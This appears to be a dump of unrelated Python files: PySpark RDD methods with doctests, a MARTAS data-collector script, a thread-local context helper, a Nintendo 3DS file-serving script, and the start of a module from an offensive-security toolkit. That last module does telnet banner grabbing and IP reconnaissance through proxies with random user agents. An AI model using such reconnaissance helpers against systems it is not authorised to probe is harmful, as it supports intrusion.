>>> map((lambda (x,y): (x, list(y))), sorted(x.groupByKey().collect()))
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
a.extend(b)
return a
return self.combineByKey(createCombiner, mergeValue, mergeCombiners,
numPartitions).mapValues(lambda x: ResultIterable(x))
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda (k, v): ((k, x) for x in f(v))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda (k, v): (k, f(v))
return self.map(map_values_fn, preservesPartitioning=True)
def groupWith(self, other, *others):
"""
Alias for cogroup but with support for multiple RDDs.
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> map((lambda (x,y): (x, (list(y[0]), list(y[1]), list(y[2]), list(y[3])))), \
sorted(list(w.groupWith(x, y, z).collect())))
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
    # TODO: add variant with custom partitioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in C{self} or C{other}, return a resulting RDD that
contains a tuple with the list of values for that key in C{self} as
well as C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> map((lambda (x,y): (x, (list(y[0]), list(y[1])))), sorted(list(x.cogroup(y).collect())))
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup((self, other), numPartitions)
def sampleByKey(self, withReplacement, fractions, seed=None):
"""
Return a subset of this RDD sampled by key (via stratified sampling).
Create a sample of this RDD using variable sampling rates for
different keys as specified by fractions, a key to sampling rate map.
>>> fractions = {"a": 0.2, "b": 0.1}
>>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000)))
>>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect())
>>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150
True
>>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0
True
>>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0
True
"""
for fraction in fractions.values():
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(
RDDStratifiedSampler(withReplacement, fractions, seed).func, True)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in C{self} that has no pair with matching
key in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func((key, vals)):
return vals[0] and not vals[1]
return self.cogroup(other, numPartitions).filter(filter_func).flatMapValues(lambda x: x[0])
def subtract(self, other, numPartitions=None):
"""
Return each value in C{self} that is not contained in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys()
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying C{f}.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> map((lambda (x,y): (x, (list(y[0]), (list(y[1]))))), sorted(x.cogroup(y).collect()))
[(0, ([0], [0])), (1, ([1], [1])), (2, ([], [2])), (3, ([], [3])), (4, ([2], [4]))]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
jrdd = self._jrdd.repartition(numPartitions)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
jrdd = self._jrdd.coalesce(numPartitions)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def zip(self, other):
"""
Zips this RDD with another one, returning key-value pairs with the
        first element in each RDD, second element in each RDD, etc. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
def get_batch_size(ser):
if isinstance(ser, BatchedSerializer):
return ser.batchSize
return 1 # not batched
def batch_as(rdd, batchSize):
return rdd._reserialize(BatchedSerializer(PickleSerializer(), batchSize))
my_batch = get_batch_size(self._jrdd_deserializer)
other_batch = get_batch_size(other._jrdd_deserializer)
if my_batch != other_batch:
# use the smallest batchSize for both of them
batchSize = min(my_batch, other_batch)
if batchSize <= 0:
# auto batched or unlimited
batchSize = 100
other = batch_as(other, batchSize)
self = batch_as(self, batchSize)
if self.getNumPartitions() != other.getNumPartitions():
raise ValueError("Can only zip with RDD which has the same number of partitions")
# There will be an Exception in JVM if there are different number
# of items in each partitions.
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def zipWithIndex(self):
"""
Zips this RDD with its element indices.
The ordering is first based on the partition index and then the
ordering of items within each partition. So the first item in
the first partition gets index 0, and the last item in the last
partition receives the largest index.
This method needs to trigger a spark job when this RDD contains
        more than one partition.
>>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect()
[('a', 0), ('b', 1), ('c', 2), ('d', 3)]
"""
starts = [0]
if self.getNumPartitions() > 1:
nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect()
for i in range(len(nums) - 1):
starts.append(starts[-1] + nums[i])
def func(k, it):
for i, v in enumerate(it, starts[k]):
yield v, i
return self.mapPartitionsWithIndex(func)
def zipWithUniqueId(self):
"""
Zips this RDD with generated unique Long ids.
Items in the kth partition will get ids k, n+k, 2*n+k, ..., where
n is the number of partitions. So there may exist gaps, but this
method won't trigger a spark job, which is different from
        L{zipWithIndex}.
>>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect()
[('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)]
"""
n = self.getNumPartitions()
def func(k, it):
for i, v in enumerate(it):
yield v, i * n + k
return self.mapPartitionsWithIndex(func)
def name(self):
"""
Return the name of this RDD.
"""
name_ = self._jrdd.name()
if name_:
return name_.encode('utf-8')
def setName(self, name):
"""
Assign a name to this RDD.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.setName('RDD1').name()
'RDD1'
"""
self._jrdd.setName(name)
return self
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
if debug_string:
return debug_string.encode('utf-8')
def getStorageLevel(self):
"""
Get the RDD's current storage level.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication())
return storage_level
def _defaultReducePartitions(self):
"""
Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
If spark.default.parallelism is set, then we'll use the value from SparkContext
defaultParallelism, otherwise we'll use the number of partitions in this RDD.
This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
be inherent.
"""
if self.ctx._conf.contains("spark.default.parallelism"):
return self.ctx.defaultParallelism
else:
return self.getNumPartitions()
def lookup(self, key):
"""
Return the list of values in the RDD for key `key`. This operation
is done efficiently if the RDD has a known partitioner by only
searching the partition that the key maps to.
>>> l = range(1000)
>>> rdd = sc.parallelize(zip(l, l), 10)
>>> rdd.lookup(42) # slow
[42]
>>> sorted = rdd.sortByKey()
>>> sorted.lookup(42) # fast
[42]
>>> sorted.lookup(1024)
[]
"""
values = self.filter(lambda (k, v): k == key).values()
if self._partitionFunc is not None:
return self.ctx.runJob(values, lambda x: x, [self._partitionFunc(key)], False)
return values.collect()
def _to_java_object_rdd(self):
""" Return an JavaRDD of Object by unpickling
It will convert each Python object into Java object by Pyrolite, whenever the
RDD is serialized in batch or not.
"""
rdd = self._pickled()
return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True)
def countApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate version of count() that returns a potentially incomplete
result within a timeout, even if not all tasks have finished.
>>> rdd = sc.parallelize(range(1000), 10)
>>> rdd.countApprox(1000, 1.0)
1000
"""
drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))])
return int(drdd.sumApprox(timeout, confidence))
def sumApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the sum within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(xrange(1000))
>>> (rdd.sumApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.sumApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def meanApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the mean within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(xrange(1000)) / 1000.0
>>> (rdd.meanApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.map(float)._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.meanApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def countApproxDistinct(self, relativeSD=0.05):
"""
.. note:: Experimental
Return approximate number of distinct elements in the RDD.
The algorithm used is based on streamlib's implementation of
"HyperLogLog in Practice: Algorithmic Engineering of a State
of The Art Cardinality Estimation Algorithm", available
<a href="http://dx.doi.org/10.1145/2452376.2452456">here</a>.
:param relativeSD: Relative accuracy. Smaller values create
counters that require more space.
It must be greater than 0.000017.
>>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct()
>>> 950 < n < 1050
True
>>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct()
>>> 18 < n < 22
True
"""
if relativeSD < 0.000017:
raise ValueError("relativeSD should be greater than 0.000017")
if relativeSD > 0.37:
raise ValueError("relativeSD should be smaller than 0.37")
# the hash space in Java is 2^32
hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF)
return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD)
def toLocalIterator(self):
"""
Return an iterator that contains all of the elements in this RDD.
The iterator will consume as much memory as the largest partition in this RDD.
>>> rdd = sc.parallelize(range(10))
>>> [x for x in rdd.toLocalIterator()]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
partitions = xrange(self.getNumPartitions())
for partition in partitions:
rows = self.context.runJob(self, lambda x: x, [partition])
for row in rows:
yield row
def _prepare_for_python_RDD(sc, command, obj=None):
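    # Serialize the (func, profiler, deserializers) command with CloudPickle.
    # Commands larger than 1MB are shipped to the JVM through a broadcast
    # variable instead of being embedded directly in the pickled job, and the
    # broadcast's lifetime is tied to `obj` (the PipelinedRDD) when given.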
# the serialized command will be compressed by broadcast
ser = CloudPickleSerializer()
pickled_command = ser.dumps(command)
if len(pickled_command) > (1 << 20): # 1M
broadcast = sc.broadcast(pickled_command)
pickled_command = ser.dumps(broadcast)
# tracking the life cycle by obj
if obj is not None:
obj._broadcast = broadcast
broadcast_vars = ListConverter().convert(
[x._jbroadcast for x in sc._pickled_broadcast_vars],
sc._gateway._gateway_client)
sc._pickled_broadcast_vars.clear()
env = MapConverter().convert(sc.environment, sc._gateway._gateway_client)
includes = ListConverter().convert(sc._python_includes, sc._gateway._gateway_client)
return pickled_command, broadcast_vars, env, includes
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func = prev.func
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._id = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
self._partitionFunc = prev._partitionFunc if self.preservesPartitioning else None
self._broadcast = None
def __del__(self):
if self._broadcast:
self._broadcast.unpersist()
self._broadcast = None
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
if self.ctx.profiler_collector:
profiler = self.ctx.profiler_collector.new_profiler(self.ctx)
else:
profiler = None
command = (self.func, profiler, self._prev_jrdd_deserializer,
self._jrdd_deserializer)
pickled_cmd, bvars, env, includes = _prepare_for_python_RDD(self.ctx, command, self)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(),
bytearray(pickled_cmd),
env, includes, self.preservesPartitioning,
self.ctx.pythonExec,
bvars, self.ctx._javaAccumulator)
self._jrdd_val = python_rdd.asJavaRDD()
if profiler:
self._id = self._jrdd_val.id()
self.ctx.profiler_collector.add_profiler(self._id, profiler)
return self._jrdd_val
def id(self):
if self._id is None:
self._id = self._jrdd.id()
return self._id
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest')
(failure_count, test_count) = doctest.testmod(
globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
|
collector-martas.py
|
"""
Collector script for obtaining real time data from MARTAS machines.
The collector accesses the autobahn websocket from MARTAS and retrieves data. This data is
directly added to a database (or to a file if preferred).
"""
import sys, os, csv
from twisted.python import log
from twisted.internet import reactor
try: # version > 0.8.0
from autobahn.wamp1.protocol import WampClientFactory, WampClientProtocol
except:
from autobahn.wamp import WampClientFactory, WampClientProtocol
try: # autovers > 0.7.0:
from autobahn.twisted.websocket import connectWS
except:
from autobahn.websocket import connectWS
# For converting Unicode text
import collections
from magpy.collector import subscribe2client as cl
from magpy.opt import cred as mpcred
from magpy.transfer import scptransfer
import pymysql as mysql
from multiprocessing import Process
import pwd
class MartasInfo():
"""
    Class to obtain sensor information from MARTAS.
    The scp process which is used for that purpose cannot
    be run as root; this would not allow testing for sensors
    at bootup.
    The MartasInfo class is therefore run as an independent process, switching
    to a standard user of the system.
    The class is currently not working because the current version of pexpect.spawn returns an error...
"""
def GetSensors(self, user, scpuser, scppasswd, source, dest):
pw = pwd.getpwnam(user)
uid = pw.pw_uid
os.setuid(uid)
print ("setuid successful to", uid)
try:
scptransfer(scpuser+'@'+source,dest,scppasswd)
except:
print ("Could not connect to/get sensor info of client %s" % clientname)
# TODO
"""
a) check working state of db version for all sensors OW (OK), LEMI (OK), POS, CS, GSM, ENV (OK), etc
b) check working state of file version OW (OK), LEMI, POS, CS, GSM, ENV (OK), etc
c) (OK) check autorun of MARTAS on reboot (with .conf (OK) and .sh (OK))
d) check autorun of MARCOS on reboot (with .conf (?) and .sh (?))
e) (OK) check stability (no sensor attached (OK), OW sensor removed while running (OK), OW sensor added while running (System failure on first try, OK on second - HOWEVER all other sensors get lost!!!), Other sensor: adding (requires restart of Martas and Marcos - Marcos is stopped))
f) automatically restart MARCOS once a day (when??, ideally shortly before scheduled upload)
g) add nagios test whether collectors are running (add to MARCOS/Nagios)
h) (OK) add script to MARCOS for file upload by cron
i) add a web script like (single.html) to MARCOS/WebScripts
j) (OK) add a Version number to MARCOS and MARTAS (eventually add both of them to the MagPy folder...)
k) MARTAS tests: run through WLAN, UMTS
l) test file upload by stream2db before/after collector with changing db info in datainfo and sensor
m) future version: send commands
"""
if __name__ == '__main__':
# ----------------------------------------------------------
# 1. Define client (or get it from database?)
# ----------------------------------------------------------
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# do necessary changes below
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# Name of martas
#clientname = 'raspberrypi'
clientname = 'ceres'
# IP of martas
clientip = '138.22.188.181'
# Path of MARTAS directory on martas machine
martaspath = '/home/cobs/MARTAS'
# Path of MARCOS directory
homedir = '/home/cobs'
defaultuser = 'cobs'
# Provide Station code
stationid = 'WIC'
# Select destination (file or db) - Files are saved in .../MARCOS/MartasFiles/
dest = 'db'
# For Testing purposes - Print received data to screen:
printdata = False
# Please make sure that the db and scp connection data is stored
# within the credential file -otherwise provide this data directly
dbhost = mpcred.lc('cobsdb','host',path='/home/cobs/.magpycred')
dbuser = mpcred.lc('cobsdb','user',path='/home/cobs/.magpycred')
dbpasswd = mpcred.lc('cobsdb','passwd',path='/home/cobs/.magpycred')
dbname = mpcred.lc('cobsdb','db',path='/home/cobs/.magpycred')
scpuser = mpcred.lc('ceres','user',path='/home/cobs/.magpycred')
scppasswd = mpcred.lc('ceres','passwd',path='/home/cobs/.magpycred')
# You can add to the credential file by using:
# mpcred.cc('transfer','myshortcut',user='myuser',passwd='mypasswd',address='no-specific')
    # and then read it with scpuser = mpcred.lc('myshortcut','user')
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# do necessary changes above
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
print (dbhost, dbuser, dbpasswd, dbname, scpuser)
logfile = os.path.join(homedir,'MARCOS','Logs','marcos.log')
log.startLogging(open(logfile,'a'))
sshcredlst = [scpuser,scppasswd]
# ----------------------------------------------------------
# 2. connect to database and check availability and version
# ----------------------------------------------------------
try:
db = mysql.connect (host=dbhost,user=dbuser,passwd=dbpasswd,db=dbname)
dbcredlst = [dbhost,dbuser,dbpasswd,dbname]
except:
print ("Create a credential file first or provide login info for database directly")
raise
cursor = db.cursor ()
cursor.execute ("SELECT VERSION()")
row = cursor.fetchone ()
print ("MySQL server version:", row[0])
cursor.close ()
db.close ()
# ----------------------------------------------------------
# 3. connect to client and get sensor list as well as owlist
# ----------------------------------------------------------
print ("Locating MARCOS directory ...")
destpath = [path for path, dirs, files in os.walk("/home") if path.endswith('MARCOS')][0]
sensfile = os.path.join(martaspath,'sensors.txt')
owfile = os.path.join(martaspath,'owlist.csv')
destsensfile = os.path.join(destpath,'MartasSensors',clientname+'_sensors.txt')
destowfile = os.path.join(destpath,'MartasSensors',clientname+'_owlist.csv')
print ("Getting sensor information from ", clientname)
## to be activated if multiprocessing and pexpect are working again
#MI=MartasInfo()
#source = clientip+':'+sensfile
#p = Process(target=MI.GetSensors, args=('cobs',scpuser,scppasswd,source,destsensfile,))
#p.start()
#p.join()
#source = clientip+':'+owfile
#p = Process(target=MI.GetSensors, args=('cobs',scpuser,scppasswd,source,destowfile,))
#p.start()
#p.join()
    # Please note: scp does not work when run as root
# Therefore the following processes are performed as defaultuser (ideally as a subprocess)
uid=pwd.getpwnam(defaultuser)[2]
os.setuid(uid)
try:
print ("{}@{}:{}".format(scpuser,clientip,sensfile))
scptransfer(scpuser+'@'+clientip+':'+sensfile,destsensfile,scppasswd)
except:
print ("Could not connect to/get sensor info of client %s - aborting" % clientname)
sys.exit()
print ("Searching for onewire data from ", clientname)
try:
scptransfer(scpuser+'@'+clientip+':'+owfile,destowfile,scppasswd)
except:
print ("No one wire info available on client %s - proceeding" % clientname)
pass
s,o = [],[]
with open(destsensfile,'rb') as f:
reader = csv.reader(f)
s = []
for line in reader:
print (line)
if len(line) < 2:
try:
s.append(line[0].split())
except:
# Empty line for example
pass
else:
s.append(line)
print (s)
if os.path.exists(destowfile):
with open(destowfile,'rb') as f:
reader = csv.reader(f)
o = [line for line in reader]
print (o)
factory = WampClientFactory("ws://"+clientip+":9100", debugWamp = False)
cl.sendparameter(clientname,clientip,destpath,dest,stationid,sshcredlst,s,o,printdata,dbcredlst)
factory.protocol = cl.PubSubClient
connectWS(factory)
reactor.run()
try:
cursor.close()
db.close()
log.msg("DB closed")
except:
pass
|
context.py
|
import threading
from contextlib import contextmanager
class Context(threading.local):
def __init__(self):
self._ctx = [{}]
def __getattr__(self, name):
for scope in reversed(self._ctx):
if name in scope:
return scope[name]
raise AttributeError(name)
def get(self, name, default=None):
try:
return getattr(self, name)
except AttributeError:
return default
@contextmanager
def __call__(self, **attrs):
self._ctx.append(attrs)
try:
yield
finally:
_d = self._ctx.pop()
assert attrs is _d
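# A minimal usage sketch (hypothetical values): attributes set inside the
# `with` block shadow outer scopes and are popped again on exit.
#
#   ctx = Context()
#   with ctx(user="alice"):
#       assert ctx.user == "alice"
#       with ctx(user="bob"):        # inner scope shadows the outer one
#           assert ctx.user == "bob"
#       assert ctx.user == "alice"   # outer value restored on exit
#   assert ctx.get("user") is None   # default once all scopes are gone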
def test_threading():
import random
import time
context = Context()
def f(i):
with context(i=i):
g(i)
def g(i):
assert context.i == i
time.sleep(random.random())
assert context.i == i
print(i, end=', ')
for i in range(100):
t = threading.Thread(target=f, args=(i,))
t.start()
# test_threading()
context = Context()
|
servefiles.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import socket
import struct
import sys
import threading
import time
import urllib
try:
from SimpleHTTPServer import SimpleHTTPRequestHandler
from SocketServer import TCPServer
from urllib import quote
input = raw_input
except ImportError:
from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
from urllib.parse import quote
interactive = False
if len(sys.argv) <= 2:
# If there aren't enough variables, use interactive mode
if len(sys.argv) == 2:
if sys.argv[1].lower() in ('--help', '-help', 'help', 'h', '-h', '--h'):
print('Usage: ' + sys.argv[0] + ' <target ip> <file / directory> [host ip] [host port]')
sys.exit(1)
interactive = True
elif len(sys.argv) < 3 or len(sys.argv) > 6:
print('Usage: ' + sys.argv[0] + ' <target ip> <file / directory> [host ip] [host port]')
sys.exit(1)
accepted_extension = ('.cia', '.tik', '.cetk', '.3dsx')
hostPort = 8080 # Default value
if interactive:
    target_ip = input("The IP of your 3DS: ")
    target_path = input("The file you want to send (.cia, .tik, .cetk, or .3dsx): ")
    hostIp = input("Host IP (or press Enter to have the script detect host IP):")
    if hostIp == '':
        print('Detecting host IP...')
        hostIp = [(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]
    # ask for the port in every interactive run (it was previously skipped when
    # the host IP was auto-detected) and convert it to the int TCPServer needs
    hostPort = input("Host port (or press Enter to keep default, 8080):")
    if hostPort == '':
        hostPort = 8080  # Default
    else:
        hostPort = int(hostPort)
else:
# (if the script is being run using a full python path; ex: "path/to/python script_name.py foo foo..")
if sys.argv[1] == os.path.basename(__file__):
target_ip = sys.argv[2]
target_path = sys.argv[3]
if len(sys.argv) >= 5:
hostIp = sys.argv[4]
if len(sys.argv) == 6:
hostPort = int(sys.argv[5])
else:
print('Detecting host IP...')
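            # Connecting a UDP socket to a public address sends no packets but
            # makes the OS pick the outgoing interface; getsockname() then
            # reports that interface's address, used here as the host IP.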
hostIp = [(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]
# (if the script is being run using just the script name and default executable for python scripts; ex: "script_name.py foo foo..")
else:
target_ip = sys.argv[1]
target_path = sys.argv[2]
if len(sys.argv) >= 4:
hostIp = sys.argv[3]
if len(sys.argv) == 5:
hostPort = int(sys.argv[4])
else:
print('Detecting host IP...')
hostIp = [(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]
if not os.path.exists(target_path):
print(target_path + ': No such file or directory.')
sys.exit(1)
print('Preparing data...')
baseUrl = hostIp + ':' + str(hostPort) + '/'
if os.path.isfile(target_path):
if target_path.endswith(accepted_extension):
file_list_payload = baseUrl + quote(os.path.basename(target_path))
directory = os.path.dirname(target_path) # get file directory
else:
        print('Unsupported file extension. Supported extensions are: ' + ', '.join(accepted_extension))
sys.exit(1)
else:
directory = target_path # it's a directory
file_list_payload = '' # init the payload before adding lines
for file in [file for file in next(os.walk(target_path))[2] if file.endswith(accepted_extension)]:
file_list_payload += baseUrl + quote(file) + '\n'
if len(file_list_payload) == 0:
print('No files to serve.')
sys.exit(1)
file_list_payloadBytes = file_list_payload.encode('ascii')
if directory and directory != '.': # doesn't need to move if it's already the current working directory
os.chdir(directory) # set working directory to the right folder to be able to serve files
print('\nURLs:')
print(file_list_payload + '\n')
class MyServer(TCPServer):
def server_bind(self):
import socket
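        # SO_REUSEADDR lets the server rebind the port immediately after a
        # previous run, even if the old socket is still in TIME_WAIT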
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
print('Opening HTTP server on port ' + str(hostPort))
server = MyServer(('', hostPort), SimpleHTTPRequestHandler)
thread = threading.Thread(target=server.serve_forever)
thread.start()
try:
print('Sending URL(s) to ' + target_ip + ' on port 5000...')
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_ip, 5000))
sock.sendall(struct.pack('!L', len(file_list_payloadBytes)) + file_list_payloadBytes)
while len(sock.recv(1)) < 1:
time.sleep(0.05)
sock.close()
except Exception as e:
print('An error occurred: ' + str(e))
server.shutdown()
sys.exit(1)
print('Shutting down HTTP server...')
server.shutdown()
|
info_s.py
|
import requests,urllib,socket,random,time,re,threading,sys,whois,json,os,xtelnet
import bs4
from bs4 import BeautifulSoup
from bane.payloads import *
if os.path.isdir('/data/data/com.termux/')==False:
import dns.resolver
def get_banner(u,p=23,timeout=3,payload=None):
try:
return xtelnet.get_banner(u,p=p,timeout=timeout,payload=payload)
except:
return None
def info(u,timeout=10,proxy=None):
'''
    this function fetches all information about the given IP or domain using check-host.net and returns it to the user as a string
    with this format:
    'requested information: result'
    it takes these arguments:
    u: IP or domain
    timeout: (set by default to: 10) timeout flag for the request
    proxy: (set by default to: None) optional HTTP proxy given as 'IP:PORT'
usage:
>>>import bane
>>>domain='www.google.com'
>>>bane.info(domain)
'''
if proxy:
proxy={'http':'http://'+proxy}
try:
h=''
u='https://check-host.net/ip-info?host='+u
c=requests.get(u, headers = {'User-Agent': random.choice(ua)},proxies=proxy,timeout=timeout).text
soup = BeautifulSoup(c,"html.parser")
d=soup.find_all("tr")
for a in d:
try:
b=str(a)
if "IP address" not in b:
a=b.split('<td>')[1].split('!')[0]
a=a.split('</td>')[0].split('!')[0]
c=b.split('<td>')[2].split('!')[0]
c=c.split('</td>')[0].split('!')[0]
if "strong" in c:
for n in ['</strong>','<strong>']:
c=c.replace(n,"")
if "<a" in c:
c=c.split('<a')[0].split('!')[0]
c=c.split('</a>')[0].split('!')[0]
if "<img" in c:
c=c.split('<img')[1].split('!')[0]
c=c.split('/>')[1].split('!')[0]
n=a.strip()+': '+c.strip()
h+=n+'\n'
except Exception as e:
pass
